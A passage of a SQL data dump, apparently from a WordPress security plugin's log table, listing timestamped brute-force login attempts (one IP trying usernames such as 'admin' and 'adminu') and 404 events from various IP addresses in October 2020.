22:33:27',NULL,NULL,'adminu'),(71734,'brute_force','2020-10-05 17:33:34','2020-10-05 22:33:34','5.188.62.25',NULL,NULL),(71735,'brute_force','2020-10-05 17:33:34','2020-10-05 22:33:34',NULL,NULL,'zphiblgz'),(71736,'brute_force','2020-10-05 17:46:10','2020-10-05 22:46:10','5.188.62.25',NULL,NULL),(71737,'brute_force','2020-10-05 17:46:10','2020-10-05 22:46:10',NULL,NULL,'adminu'),(71738,'brute_force','2020-10-05 17:46:16','2020-10-05 22:46:16','5.188.62.25',NULL,NULL),(71739,'brute_force','2020-10-05 17:46:16','2020-10-05 22:46:16',NULL,NULL,'zphiblgz'),(71740,'brute_force','2020-10-05 17:59:01','2020-10-05 22:59:01','5.188.62.25',NULL,NULL),(71741,'brute_force','2020-10-05 17:59:01','2020-10-05 22:59:01',NULL,NULL,'adminu'),(71742,'brute_force','2020-10-05 17:59:06','2020-10-05 22:59:06','5.188.62.25',NULL,NULL),(71743,'brute_force','2020-10-05 17:59:06','2020-10-05 22:59:06',NULL,NULL,'zphiblgz'),(71744,'brute_force','2020-10-05 18:11:40','2020-10-05 23:11:40','5.188.62.25',NULL,NULL),(71745,'brute_force','2020-10-05 18:11:40','2020-10-05 23:11:40',NULL,NULL,'adminu'),(71746,'brute_force','2020-10-05 18:11:44','2020-10-05 23:11:44','5.188.62.25',NULL,NULL),(71747,'brute_force','2020-10-05 18:11:44','2020-10-05 23:11:44',NULL,NULL,'admin'),(71748,'brute_force','2020-10-05 18:24:10','2020-10-05 23:24:10','5.188.62.25',NULL,NULL),(71749,'brute_force','2020-10-05 18:24:10','2020-10-05 23:24:10',NULL,NULL,'adminu'),(71750,'brute_force','2020-10-05 18:24:17','2020-10-05 23:24:17','5.188.62.25',NULL,NULL),(71751,'brute_force','2020-10-05 18:24:17','2020-10-05 23:24:17',NULL,NULL,'admin'),(71752,'brute_force','2020-10-05 18:36:45','2020-10-05 23:36:45','5.188.62.25',NULL,NULL),(71753,'brute_force','2020-10-05 18:36:45','2020-10-05 23:36:45',NULL,NULL,'adminu'),(71754,'brute_force','2020-10-05 18:36:49','2020-10-05 23:36:49','5.188.62.25',NULL,NULL),(71755,'brute_force','2020-10-05 18:36:49','2020-10-05 23:36:49',NULL,NULL,'admin'),(71756,'brute_force','2020-10-05 18:49:29','2020-10-05 23:49:29','5.188.62.25',NULL,NULL),(71757,'brute_force','2020-10-05 18:49:29','2020-10-05 23:49:29',NULL,NULL,'adminu'),(71758,'brute_force','2020-10-05 18:49:36','2020-10-05 23:49:36','5.188.62.25',NULL,NULL),(71759,'brute_force','2020-10-05 18:49:36','2020-10-05 23:49:36',NULL,NULL,'admin'),(71760,'four_oh_four','2020-10-05 18:57:09','2020-10-05 23:57:09','188.122.82.146',NULL,NULL),(71761,'brute_force','2020-10-05 19:02:12','2020-10-06 00:02:12','5.188.62.25',NULL,NULL),(71762,'brute_force','2020-10-05 19:02:12','2020-10-06 00:02:12',NULL,NULL,'adminu'),(71763,'brute_force','2020-10-05 19:02:16','2020-10-06 00:02:16','5.188.62.25',NULL,NULL),(71764,'brute_force','2020-10-05 19:02:16','2020-10-06 00:02:16',NULL,NULL,'zphiblgz'),(71765,'four_oh_four','2020-10-05 19:12:28','2020-10-06 00:12:28','178.137.88.142',NULL,NULL),(71766,'brute_force','2020-10-05 19:14:55','2020-10-06 00:14:55','5.188.62.25',NULL,NULL),(71767,'brute_force','2020-10-05 19:14:55','2020-10-06 00:14:55',NULL,NULL,'adminu'),(71768,'brute_force','2020-10-05 19:14:59','2020-10-06 00:14:59','5.188.62.25',NULL,NULL),(71769,'brute_force','2020-10-05 19:14:59','2020-10-06 00:14:59',NULL,NULL,'admin'),(71770,'brute_force','2020-10-05 19:27:39','2020-10-06 00:27:39','5.188.62.25',NULL,NULL),(71771,'brute_force','2020-10-05 19:27:39','2020-10-06 00:27:39',NULL,NULL,'adminu'),(71772,'brute_force','2020-10-05 19:27:47','2020-10-06 00:27:47','5.188.62.25',NULL,NULL),(71773,'brute_force','2020-10-05 19:27:47','2020-10-06 00:27:47',NULL,NULL,'admin'),(71774,'four_oh_four','2020-10-05 19:33:21','2020-10-06 00:33:21','93.85.168.118',NULL,NULL),(71775,'brute_force','2020-10-05 19:40:24','2020-10-06 00:40:24','5.188.62.25',NULL,NULL),(71776,'brute_force','2020-10-05 19:40:24','2020-10-06 00:40:24',NULL,NULL,'adminu'),(71777,'brute_force','2020-10-05 19:40:31','2020-10-06 00:40:31','5.188.62.25',NULL,NULL),(71778,'brute_force','2020-10-05 19:40:31','2020-10-06 00:40:31',NULL,NULL,'admin'),(71779,'brute_force','2020-10-05 19:53:18','2020-10-06 00:53:18','5.188.62.25',NULL,NULL),(71780,'brute_force','2020-10-05 19:53:18','2020-10-06 00:53:18',NULL,NULL,'adminu'),(71781,'brute_force','2020-10-05 20:06:09','2020-10-06 01:06:09','5.188.62.25',NULL,NULL),(71782,'brute_force','2020-10-05 20:06:09','2020-10-06 01:06:09',NULL,NULL,'adminu'),(71783,'four_oh_four','2020-10-05 20:06:45','2020-10-06 01:06:45','114.119.157.110',NULL,NULL),(71784,'brute_force','2020-10-05 20:19:04','2020-10-06 01:19:04','5.188.62.25',NULL,NULL),(71785,'brute_force','2020-10-05 20:19:04','2020-10-06 01:19:04',NULL,NULL,'adminu'),(71786,'brute_force','2020-10-05 20:31:47','2020-10-06 01:31:47','5.188.62.25',NULL,NULL),(71787,'brute_force','2020-10-05 20:31:47','2020-10-06 01:31:47',NULL,NULL,'adminu'),(71788,'brute_force','2020-10-05 20:44:39','2020-10-06 01:44:39','5.188.62.25',NULL,NULL),(71789,'brute_force','2020-10-05 20:44:39','2020-10-06 01:44:39',NULL,NULL,'adminu'),(71790,'four_oh_four','2020-10-05 20:57:38','2020-10-06 01:57:38','114.119.130.104',NULL,NULL),(71791,'brute_force','2020-10-05 20:57:37','2020-10-06 01:57:37','5.188.62.25',NULL,NULL),(71792,'brute_force','2020-10-05 20:57:37','2020-10-06 01:57:37',NULL,NULL,'adminu'),(71793,'brute_force','2020-10-05 21:10:36','2020-10-06 02:10:36','5.188.62.25',NULL,NULL),(71794,'brute_force','2020-10-05 21:10:36','2020-10-06 02:10:36',NULL,NULL,'adminu'),(71795,'four_oh_four','2020-10-05 21:16:51','2020-10-06 02:16:51','5.188.84.251',NULL,NULL),(71796,'four_oh_four','2020-10-05 21:16:50','2020-10-06 02:16:50','72.11.148.222',NULL,NULL),(71797,'four_oh_four','2020-10-05 21:16:54','2020-10-06 02:16:54','72.11.148.222',NULL,NULL),(71798,'brute_force','2020-10-05 21:23:28','2020-10-06 02:23:28','5.188.62.25',NULL,NULL),(71799,'brute_force','2020-10-05 21:23:28','2020-10-06 02:23:28',NULL,NULL,'adminu'),(71800,'brute_force','2020-10-05 21:36:27','2020-10-06 02:36:27','5.188.62.25',NULL,NULL),(71801,'brute_force','2020-10-05 21:36:27','2020-10-06 02:36:27',NULL,NULL,'adminu'),(71802,'brute_force','2020-10-05 21:49:26','2020-10-06 02:49:26','5.188.62.25',NULL,NULL),(71803,'brute_force','2020-10-05 21:49:26','2020-10-06 02:49:26',NULL,NULL,'adminu'),(71804,'brute_force','2020-10-05 22:02:18','2020-10-06 03:02:18','5.188.62.25',NULL,NULL),(71805,'brute_force','2020-10-05 22:02:18','2020-10-06 03:02:18',NULL,NULL,'adminu'),(71806,'brute_force','2020-10-05 22:15:02','2020-10-06 03:15:02','5.188.62.25',NULL,NULL),(71807,'brute_force','2020-10-05 22:15:02','2020-10-06 03:15:02',NULL,NULL,'adminu'),(71808,'brute_force','2020-10-05 22:27:46','2020-10-06 03:27:46','5.188.62.25',NULL,NULL),(71809,'brute_force','2020-10-05 22:27:46','2020-10-06 03:27:46',NULL,NULL,'adminu'),(71810,'brute_force','2020-10-05 22:40:34','2020-10-06 03:40:34','5.188.62.25',NULL,NULL),(71811,'brute_force','2020-10-05 22:40:34','2020-10-06 03:40:34',NULL,NULL,'adminu'),(71812,'brute_force','2020-10-05 22:53:41','2020-10-06 03:53:41','5.188.62.25',NULL,NULL),(71813,'brute_force','2020-10-05 22:53:41','2020-10-06 03:53:41',NULL,NULL,'adminu'),(71814,'brute_force','2020-10-05 23:06:30','2020-10-06 04:06:30','5.188.62.25',NULL,NULL),(71815,'brute_force','2020-10-05 23:06:30','2020-10-06 04:06:30',NULL,NULL,'adminu'),(71816,'brute_force','2020-10-05 23:19:16','2020-10-06 04:19:16','5.188.62.25',NULL,NULL),(71817,'brute_force','2020-10-05 23:19:16','2020-10-06 04:19:16',NULL,NULL,'adminu'),(71818,'four_oh_four','2020-10-05 23:31:18','2020-10-06 04:31:18','114.119.148.105',NULL,NULL),(71819,'brute_force','2020-10-05 23:32:16','2020-10-06 04:32:16','5.188.62.25',NULL,NULL),(71820,'brute_force','2020-10-05 23:32:16','2020-10-06 04:32:16',NULL,NULL,'adminu'),(71821,'brute_force','2020-10-05 23:44:56','2020-10-06 04:44:56','5.188.62.25',NULL,NULL),(71822,'brute_force','2020-10-05 23:44:56','2020-10-06 04:44:56',NULL,NULL,'adminu'),(71823,'brute_force','2020-10-05 23:58:00','2020-10-06 04:58:00','5.188.62.25',NULL,NULL),(71824,'brute_force','2020-10-05 23:58:00','2020-10-06 04:58:00',NULL,NULL,'adminu'),(71825,'brute_force','2020-10-06 00:10:39','2020-10-06 05:10:39','5.188.62.25',NULL,NULL),(71826,'brute_force','2020-10-06 00:10:39','2020-10-06 05:10:39',NULL,NULL,'adminu'),(71827,'brute_force','2020-10-06 00:23:24','2020-10-06 05:23:24','5.188.62.25',NULL,NULL),(71828,'brute_force','2020-10-06 00:23:24','2020-10-06 05:23:24',NULL,NULL,'adminu'),(71829,'brute_force','2020-10-06 00:36:18','2020-10-06 05:36:18','5.188.62.25',NULL,NULL),(71830,'brute_force','2020-10-06 00:36:18','2020-10-06 05:36:18',NULL,NULL,'adminu'),(71831,'brute_force','2020-10-06 00:49:01','2020-10-06 05:49:01','5.188.62.25',NULL,NULL),(71832,'brute_force','2020-10-06 00:49:01','2020-10-06 05:49:01',NULL,NULL,'adminu'),(71833,'brute_force','2020-10-06 01:01:11','2020-10-06 06:01:11','5.188.62.25',NULL,NULL),(71834,'brute_force','2020-10-06 01:01:11','2020-10-06 06:01:11',NULL,NULL,'adminu'),(71835,'four_oh_four','2020-10-06 01:04:11','2020-10-06 06:04:11','157.55.39.110',NULL,NULL),(71836,'brute_force','2020-10-06 01:13:26','2020-10-06 06:13:26','5.188.62.25',NULL,NULL),(71837,'brute_force','2020-10-06 01:13:26','2020-10-06 06:13:26',NULL,NULL,'adminu'),(71838,'four_oh_four','2020-10-06 01:17:05','2020-10-06 06:17:05','92.124.160.70',NULL,NULL),(71839,'four_oh_four','2020-10-06 01:17:08','2020-10-06 06:17:08','92.124.160.70',NULL,NULL),(71840,'brute_force','2020-10-06 01:25:55','2020-10-06 06:25:55','5.188.62.25',NULL,NULL),(71841,'brute_force','2020-10-06 01:25:55','2020-10-06 06:25:55',NULL,NULL,'adminu'),(71842,'brute_force','2020-10-06 01:38:24','2020-10-06 06:38:24','5.188.62.25',NULL,NULL),(71843,'brute_force','2020-10-06 01:38:24','2020-10-06 06:38:24',NULL,NULL,'adminu'),(71844,'brute_force','2020-10-06 01:50:47','2020-10-06 06:50:47','5.188.62.25',NULL,NULL),(71845,'brute_force','2020-10-06 01:50:47','2020-10-06 06:50:47',NULL,NULL,'adminu'),(71846,'brute_force','2020-10-06 02:03:13','2020-10-06 07:03:13','5.188.62.25',NULL,NULL),(71847,'brute_force','2020-10-06 02:03:13','2020-10-06 07:03:13',NULL,NULL,'adminu'),(71848,'four_oh_four','2020-10-06 02:09:01','2020-10-06 07:09:01','185.123.143.252',NULL,NULL),(71849,'brute_force','2020-10-06 02:15:38','2020-10-06 07:15:38','5.188.62.25',NULL,NULL),(71850,'brute_force','2020-10-06 02:15:38','2020-10-06 07:15:38',NULL,NULL,'adminu'),(71851,'four_oh_four','2020-10-06 02:19:37','2020-10-06 07:19:37','157.55.39.145',NULL,NULL),(71852,'brute_force','2020-10-06 02:28:00','2020-10-06 07:28:00','5.188.62.25',NULL,NULL),(71853,'brute_force','2020-10-06 02:28:00','2020-10-06 07:28:00',NULL,NULL,'adminu'),(71854,'brute_force','2020-10-06 02:40:16','2020-10-06 07:40:16','5.188.62.25',NULL,NULL),(71855,'brute_force','2020-10-06 02:40:16','2020-10-06 07:40:16',NULL,NULL,'adminu'),(71856,'brute_force','2020-10-06 02:52:32','2020-10-06 07:52:32','5.188.62.25',NULL,NULL),(71857,'brute_force','2020-10-06 02:52:32','2020-10-06 07:52:32',NULL,NULL,'adminu'),(71858,'brute_force','2020-10-06 03:04:44','2020-10-06 08:04:44','5.188.62.25',NULL,NULL),(71859,'brute_force','2020-10-06 03:04:44','2020-10-06 08:04:44',NULL,NULL,'adminu'),(71860,'brute_force','2020-10-06 03:17:02','2020-10-06 08:17:02','5.188.62.25',NULL,NULL),(71861,'brute_force','2020-10-06 03:17:02','2020-10-06 08:17:02',NULL,NULL,'adminu'),(71862,'brute_force','2020-10-06 03:29:23','2020-10-06 08:29:23','5.188.62.25',NULL,NULL),(71863,'brute_force','2020-10-06 03:29:23','2020-10-06 08:29:23',NULL,NULL,'adminu'),(71864,'brute_force','2020-10-06 03:42:00','2020-10-06 08:42:00','5.188.62.25',NULL,NULL),(71865,'brute_force','2020-10-06 03:42:00','2020-10-06 08:42:00',NULL,NULL,'adminu'),(71866,'brute_force','2020-10-06 03:54:19','2020-10-06 08:54:19','5.188.62.25',NULL,NULL),(71867,'brute_force','2020-10-06 03:54:19','2020-10-06 08:54:19',NULL,NULL,'adminu'),(71868,'brute_force','2020-10-06 04:06:44','2020-10-06 09:06:44','5.188.62.25',NULL,NULL),(71869,'brute_force','2020-10-06 04:06:44','2020-10-06 09:06:44',NULL,NULL,'adminu'),(71870,'brute_force','2020-10-06 04:18:55','2020-10-06 09:18:55','5.188.62.25',NULL,NULL),(71871,'brute_force','2020-10-06 04:18:55','2020-10-06 09:18:55',NULL,NULL,'adminu'),(71872,'brute_force','2020-10-06 04:31:42','2020-10-06 09:31:42','5.188.62.25',NULL,NULL),(71873,'brute_force','2020-10-06 04:31:42','2020-10-06 09:31:42',NULL,NULL,'adminu'),(71874,'brute_force','2020-10-06 04:44:33','2020-10-06 09:44:33','5.188.62.25',NULL,NULL),(71875,'brute_force','2020-10-06 04:44:33','2020-10-06 09:44:33',NULL,NULL,'adminu'),(71876,'four_oh_four','2020-10-06 04:57:24','2020-10-06 09:57:24','114.119.130.104',NULL,NULL),(71877,'brute_force','2020-10-06 04:57:39','2020-10-06 09:57:39','5.188.62.25',NULL,NULL),(71878,'brute_force','2020-10-06 04:57:39','2020-10-06 09:57:39',NULL,NULL,'adminu'),(71879,'brute_force','2020-10-06 05:10:34','2020-10-06 10:10:34','5.188.62.25',NULL,NULL),(71880,'brute_force','2020-10-06 05:10:34','2020-10-06 10:10:34',NULL,NULL,'adminu'),(71881,'brute_force','2020-10-06 05:23:25','2020-10-06 10:23:25','5.188.62.25',NULL,NULL),(71882,'brute_force','2020-10-06 05:23:25','2020-10-06 10:23:25',NULL,NULL,'adminu'),(71883,'brute_force','2020-10-06 05:36:13','2020-10-06 10:36:13','5.188.62.25',NULL,NULL),(71884,'brute_force','2020-10-06 05:36:13','2020-10-06 10:36:13',NULL,NULL,'adminu'),(71885,'brute_force','2020-10-06 05:49:10','2020-10-06 10:49:10','5.188.62.25',NULL,NULL),(71886,'brute_force','2020-10-06 05:49:10','2020-10-06 10:49:10',NULL,NULL,'adminu'),(71887,'four_oh_four','2020-10-06 05:53:31','2020-10-06 10:53:31','114.119.151.107',NULL,NULL),(71888,'four_oh_four','2020-10-06 06:00:49','2020-10-06 11:00:49','114.119.130.104',NULL,NULL),(71889,'brute_force','2020-10-06 06:01:55','2020-10-06 11:01:55','5.188.62.25',NULL,NULL),(71890,'brute_force','2020-10-06 06:01:55','2020-10-06 11:01:55',NULL,NULL,'adminu'),(71891,'brute_force','2020-10-06 06:14:44','2020-10-06 11:14:44','5.188.62.25',NULL,NULL),(71892,'brute_force','2020-10-06 06:14:44','2020-10-06 11:14:44',NULL,NULL,'adminu'),(71893,'four_oh_four','2020-10-06 06:18:02','2020-10-06 11:18:02','114.119.141.146',NULL,NULL),(71894,'brute_force','2020-10-06 06:27:44','2020-10-06 11:27:44','5.188.62.25',NULL,NULL),(71895,'brute_force','2020-10-06 06:27:44','2020-10-06 11:27:44',NULL,NULL,'adminu'),(71896,'brute_force','2020-10-06 06:42:25','2020-10-06 11:42:25','5.188.62.25',NULL,NULL),(71897,'brute_force','2020-10-06 06:42:25','2020-10-06 11:42:25',NULL,NULL,'adminu'),(71898,'four_oh_four','2020-10-06 06:50:05','2020-10-06 11:50:05','178.137.88.142',NULL,NULL),(71899,'four_oh_four','2020-10-06 06:56:51','2020-10-06 11:56:51','5.188.84.251',NULL,NULL),(71900,'brute_force','2020-10-06 06:57:22','2020-10-06 11:57:22','5.188.62.25',NULL,NULL),(71901,'brute_force','2020-10-06 06:57:22','2020-10-06 11:57:22',NULL,NULL,'adminu'),(71902,'brute_force','2020-10-06 07:10:28','2020-10-06 12:10:28','5.188.62.25',NULL,NULL),(71903,'brute_force','2020-10-06 07:10:28','2020-10-06 12:10:28',NULL,NULL,'adminu'),(71904,'brute_force','2020-10-06 07:23:29','2020-10-06 12:23:29','5.188.62.25',NULL,NULL),(71905,'brute_force','2020-10-06 07:23:29','2020-10-06 12:23:29',NULL,NULL,'adminu'),(71906,'four_oh_four','2020-10-06 07:30:58','2020-10-06 12:30:58','114.119.143.145',NULL,NULL),(71907,'brute_force','2020-10-06 07:36:16','2020-10-06 12:36:16','5.188.62.25',NULL,NULL),(71908,'brute_force','2020-10-06 07:36:16','2020-10-06 12:36:16',NULL,NULL,'adminu'),(71909,'brute_force','2020-10-06 07:49:17','2020-10-06 12:49:17','5.188.62.25',NULL,NULL),(71910,'brute_force','2020-10-06 07:49:17','2020-10-06 12:49:17',NULL,NULL,'adminu'),(71911,'brute_force','2020-10-06 08:02:04','2020-10-06 13:02:04','5.188.62.25',NULL,NULL),(71912,'brute_force','2020-10-06 08:02:04','2020-10-06 13:02:04',NULL,NULL,'adminu'),(71913,'four_oh_four','2020-10-06 08:07:01','2020-10-06 13:07:01','78.30.227.222',NULL,NULL),(71914,'brute_force','2020-10-06 08:14:59','2020-10-06 13:14:59','5.188.62.25',NULL,NULL),(71915,'brute_force','2020-10-06 08:14:59','2020-10-06 13:14:59',NULL,NULL,'adminu'),(71916,'brute_force','2020-10-06 08:28:27','2020-10-06 13:28:27','5.188.62.25',NULL,NULL),(71917,'brute_force','2020-10-06 08:28:27','2020-10-06 13:28:27',NULL,NULL,'adminu'),(71918,'brute_force','2020-10-06 08:41:31','2020-10-06 13:41:31','5.188.62.25',NULL,NULL),(71919,'brute_force','2020-10-06 08:41:31','2020-10-06 13:41:31',NULL,NULL,'adminu'),(71920,'brute_force','2020-10-06 08:54:31','2020-10-06 13:54:31','5.188.62.25',NULL,NULL),(71921,'brute_force','2020-10-06 08:54:31','2020-10-06 13:54:31',NULL,NULL,'adminu'),(71922,'brute_force','2020-10-06 09:07:35','2020-10-06 14:07:35','5.188.62.25',NULL,NULL),(71923,'brute_force','2020-10-06 09:07:35','2020-10-06 14:07:35',NULL,NULL,'adminu'),(71924,'brute_force','2020-10-06 09:20:38','2020-10-06 14:20:38','5.188.62.25',NULL,NULL),(71925,'brute_force','2020-10-06 09:20:38','2020-10-06 14:20:38',NULL,NULL,'adminu'),(71926,'brute_force','2020-10-06 09:33:46','2020-10-06 14:33:46','5.188.62.25',NULL,NULL),(71927,'brute_force','2020-10-06 09:33:46','2020-10-06 14:33:46',NULL,NULL,'adminu'),(71928,'four_oh_four','2020-10-06 09:42:51','2020-10-06 14:42:51','40.77.167.92',NULL,NULL),(71929,'brute_force','2020-10-06 09:46:56','2020-10-06 14:46:56','5.188.62.25',NULL,NULL),(71930,'brute_force','2020-10-06 09:46:56','2020-10-06 14:46:56',NULL,NULL,'adminu'),(71931,'brute_force','2020-10-06 10:00:24','2020-10-06 15:00:24','5.188.62.25',NULL,NULL),(71932,'brute_force','2020-10-06 10:00:24','2020-10-06 15:00:24',NULL,NULL,'adminu'),(71933,'four_oh_four','2020-10-06 10:01:42','2020-10-06 15:01:42','178.137.88.142',NULL,NULL),(71934,'brute_force','2020-10-06 10:13:24','2020-10-06 15:13:24','5.188.62.25',NULL,NULL),(71935,'brute_force','2020-10-06 10:13:24','2020-10-06 15:13:24',NULL,NULL,'adminu'),(71936,'brute_force','2020-10-06 10:26:45','2020-10-06 15:26:45','5.188.62.25',NULL,NULL),(71937,'brute_force','2020-10-06 10:26:45','2020-10-06 15:26:45',NULL,NULL,'adminu'),(71938,'brute_force','2020-10-06 10:39:43','2020-10-06 15:39:43','5.188.62.25',NULL,NULL),(71939,'brute_force','2020-10-06 10:39:43','2020-10-06 15:39:43',NULL,NULL,'adminu'),(71940,'four_oh_four','2020-10-06 10:50:36','2020-10-06 15:50:36','114.119.158.13',NULL,NULL),(71941,'brute_force','2020-10-06 10:52:44','2020-10-06 15:52:44','5.188.62.25',NULL,NULL),(71942,'brute_force','2020-10-06 10:52:44','2020-10-06 15:52:44',NULL,NULL,'adminu'),(71943,'brute_force','2020-10-06 11:06:01','2020-10-06 16:06:01','5.188.62.25',NULL,NULL),(71944,'brute_force','2020-10-06 11:06:01','2020-10-06 16:06:01',NULL,NULL,'adminu'),(71945,'four_oh_four','2020-10-06 11:18:13','2020-10-06 16:18:13','94.139.227.167',NULL,NULL),(71946,'brute_force','2020-10-06 11:19:14','2020-10-06 16:19:14','5.188.62.25',NULL,NULL),(71947,'brute_force','2020-10-06 11:19:14','2020-10-06 16:19:14',NULL,NULL,'adminu'),(71948,'brute_force','2020-10-06 11:32:12','2020-10-06 16:32:12','5.188.62.25',NULL,NULL),(71949,'brute_force','2020-10-06 11:32:12','2020-10-06 16:32:12',NULL,NULL,'adminu'),(71950,'brute_force','2020-10-06 11:45:09','2020-10-06 16:45:09','5.188.62.25',NULL,NULL),(71951,'brute_force','2020-10-06 11:45:09','2020-10-06 16:45:09',NULL,NULL,'adminu'),(71952,'brute_force','2020-10-06 11:58:05','2020-10-06 16:58:05','5.188.62.25',NULL,NULL),(71953,'brute_force','2020-10-06 11:58:05','2020-10-06 16:58:05',NULL,NULL,'adminu'),(71954,'four_oh_four','2020-10-06 12:05:14','2020-10-06 17:05:14','46.161.15.40',NULL,NULL),(71955,'brute_force','2020-10-06 12:10:53','2020-10-06 17:10:53','5.188.62.25',NULL,NULL),(71956,'brute_force','2020-10-06 12:10:53','2020-10-06 17:10:53',NULL,NULL,'adminu'),(71957,'brute_force','2020-10-06 12:23:45','2020-10-06 17:23:45','5.188.62.25',NULL,NULL),(71958,'brute_force','2020-10-06 12:23:45','2020-10-06 17:23:45',NULL,NULL,'adminu'),(71959,'brute_force','2020-10-06 12:36:35','2020-10-06 17:36:35','5.188.62.25',NULL,NULL),(71960,'brute_force','2020-10-06 12:36:35','2020-10-06 17:36:35',NULL,NULL,'adminu'),(71961,'four_oh_four','2020-10-06 12:38:39','2020-10-06 17:38:39','178.137.88.142',NULL,NULL),(71962,'brute_force','2020-10-06 12:49:16','2020-10-06 17:49:16','5.188.62.25',NULL,NULL),(71963,'brute_force','2020-10-06 12:49:16','2020-10-06 17:49:16',NULL,NULL,'adminu'),(71964,'four_oh_four','2020-10-06 13:00:49','2020-10-06 18:00:49','54.38.123.225',NULL,NULL),(71965,'brute_force','2020-10-06 13:02:04','2020-10-06 18:02:04','5.188.62.25',NULL,NULL),(71966,'brute_force','2020-10-06 13:02:04','2020-10-06 18:02:04',NULL,NULL,'adminu'),(71967,'brute_force','2020-10-06 13:14:46','2020-10-06 18:14:46','5.188.62.25',NULL,NULL),(71968,'brute_force','2020-10-06 13:14:46','2020-10-06 18:14:46',NULL,NULL,'adminu'),(71969,'brute_force','2020-10-06 13:27:34','2020-10-06 18:27:34','5.188.62.25',NULL,NULL),(71970,'brute_force','2020-10-06 13:27:34','2020-10-06 18:27:34',NULL,NULL,'adminu'),(71971,'four_oh_four','2020-10-06 13:31:24','2020-10-06 18:31:24','121.89.204.243',NULL,NULL),(71972,'four_oh_four','2020-10-06 13:31:24','2020-10-06 18:31:24','121.89.204.243',NULL,NULL),(71973,'four_oh_four','2020-10-06 13:31:27','2020-10-06 18:31:27','121.89.204.243',NULL,NULL),(71974,'brute_force','2020-10-06 13:40:47','2020-10-06 18:40:47','5.188.62.25',NULL,NULL),(71975,'brute_force','2020-10-06 13:40:47','2020-10-06 18:40:47',NULL,NULL,'adminu'),(71976,'brute_force','2020-10-06 13:53:18','2020-10-06 18:53:18','5.188.62.25',NULL,NULL),(71977,'brute_force','2020-10-06 13:53:18','2020-10-06 18:53:18',NULL,NULL,'adminu'),(71978,'four_oh_four','2020-10-06 14:00:35','2020-10-06 19:00:35','66.249.65.81',NULL,NULL),(71979,'brute_force','2020-10-06 14:06:20','2020-10-06 19:06:20','5.188.62.25',NULL,NULL),(71980,'brute_force','2020-10-06 14:06:20','2020-10-06 19:06:20',NULL,NULL,'adminu'),(71981,'four_oh_four','2020-10-06 14:08:59','2020-10-06 19:08:59','184.154.139.3',NULL,NULL),(71982,'brute_force','2020-10-06 14:19:39','2020-10-06 19:19:39','5.188.62.25',NULL,NULL),(71983,'brute_force','2020-10-06 14:19:39','2020-10-06 19:19:39',NULL,NULL,'adminu'),(71984,'four_oh_four','2020-10-06 14:26:52','2020-10-06 19:26:52','114.119.143.145',NULL,NULL),(71985,'brute_force','2020-10-06 14:32:53','2020-10-06 19:32:53','5.188.62.25',NULL,NULL),(71986,'brute_force','2020-10-06 14:32:53','2020-10-06 19:32:53',NULL,NULL,'adminu'),(71987,'brute_force','2020-10-06 14:46:14','2020-10-06 19:46:14','5.188.62.25',NULL,NULL),(71988,'brute_force','2020-10-06 14:46:14','2020-10-06 19:46:14',NULL,NULL,'adminu'),(71989,'four_oh_four','2020-10-06 14:51:18','2020-10-06 19:51:18','39.101.1.61',NULL,NULL),(71990,'brute_force','2020-10-06 14:59:20','2020-10-06 19:59:20','5.188.62.25',NULL,NULL),(71991,'brute_force','2020-10-06 14:59:20','2020-10-06 19:59:20',NULL,NULL,'adminu'),(71992,'four_oh_four','2020-10-06 15:03:11','2020-10-06 20:03:11','178.137.88.142',NULL,NULL),(71993,'brute_force','2020-10-06 15:12:29','2020-10-06 20:12:29','5.188.62.25',NULL,NULL),(71994,'brute_force','2020-10-06 15:12:29','2020-10-06 20:12:29',NULL,NULL,'adminu'),(71995,'brute_force','2020-10-06 15:25:19','2020-10-06 20:25:19','5.188.62.25',NULL,NULL),(71996,'brute_force','2020-10-06 15:25:19','2020-10-06 20:25:19',NULL,NULL,'adminu'),(71997,'brute_force','2020-10-06 15:39:13','2020-10-06 20:39:13','5.188.62.25',NULL,NULL),(71998,'brute_force','2020-10-06 15:39:13','2020-10-06 20:39:13',NULL,NULL,'adminu'),(71999,'four_oh_four','2020-10-06 15:44:03','2020-10-06 20:44:03','176.99.188.100',NULL,NULL),(72000,'brute_force','2020-10-06 15:52:43','2020-10-06 20:52:43','5.188.62.25',NULL,NULL),(72001,'brute_force','2020-10-06 15:52:43','2020-10-06 20:52:43',NULL,NULL,'adminu'),(72002,'brute_force','2020-10-06 16:06:25','2020-10-06 21:06:25','5.188.62.25',NULL,NULL),(72003,'brute_force','2020-10-06 16:06:25','2020-10-06 21:06:25',NULL,NULL,'adminu'),(72004,'four_oh_four','2020-10-06 16:12:27','2020-10-06 21:12:27','114.119.134.41',NULL,NULL),(72005,'four_oh_four','2020-10-06 16:19:14','2020-10-06 21:19:14','114.119.158.13',NULL,NULL),(72006,'brute_force','2020-10-06 16:19:48','2020-10-06 21:19:48','5.188.62.25',NULL,NULL),(72007,'brute_force','2020-10-06 16:19:48','2020-10-06 21:19:48',NULL,NULL,'adminu'),(72008,'brute_force','2020-10-06 16:33:23','2020-10-06 21:33:23','5.188.62.25',NULL,NULL),(72009,'brute_force','2020-10-06 16:33:23','2020-10-06 21:33:23',NULL,NULL,'adminu'),(72010,'brute_force','2020-10-06 16:46:26','2020-10-06 21:46:26','5.188.62.25',NULL,NULL),(72011,'brute_force','2020-10-06 16:46:26','2020-10-06 21:46:26',NULL,NULL,'adminu'),(72012,'brute_force','2020-10-06 16:59:50','2020-10-06 21:59:50','5.188.62.25',NULL,NULL),(72013,'brute_force','2020-10-06 16:59:50','2020-10-06 21:59:50',NULL,NULL,'adminu'),(72014,'four_oh_four','2020-10-06 17:04:30','2020-10-06 22:04:30','3.94.137.21',NULL,NULL),(72015,'four_oh_four','2020-10-06 17:04:32','2020-10-06 22:04:32','3.94.137.21',NULL,NULL),(72016,'four_oh_four','2020-10-06 17:34:32','2020-10-06 22:34:32','5.188.84.251',NULL,NULL),(72017,'four_oh_four','2020-10-06 19:14:14','2020-10-07 00:14:14','66.249.65.90',NULL,NULL),(72018,'four_oh_four','2020-10-06 19:14:18','2020-10-07 00:14:18','66.249.65.90',NULL,NULL),(72019,'four_oh_four','2020-10-06 19:41:51','2020-10-07 00:41:51','178.137.88.142',NULL,NULL),(72020,'four_oh_four','2020-10-06 21:05:25','2020-10-07 02:05:25','114.119.145.125',NULL,NULL),(72021,'four_oh_four','2020-10-06 21:16:06','2020-10-07 02:16:06','114.119.151.107',NULL,NULL),(72022,'four_oh_four','2020-10-06 21:24:48','2020-10-07 02:24:48','114.119.157.110',NULL,NULL),(72023,'four_oh_four','2020-10-06 21:36:58','2020-10-07 02:36:58','207.46.13.44',NULL,NULL),(72024,'four_oh_four','2020-10-07 01:03:35','2020-10-07 